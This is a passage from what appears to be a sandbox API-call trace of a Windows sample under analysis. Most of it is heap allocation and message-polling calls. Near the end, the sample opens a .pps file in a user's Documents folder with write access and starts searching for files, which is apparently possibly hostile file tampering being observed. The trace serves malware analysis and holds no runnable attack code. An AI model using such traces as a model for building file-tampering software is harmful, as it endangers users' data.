hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0178.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0178.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.375] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.376] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\isutz.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0178.377] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.377] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.377] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0178.377] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.377] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.379] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.380] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0178.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.380] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.381] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpFilePart=0x0) returned 0x41 [0178.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 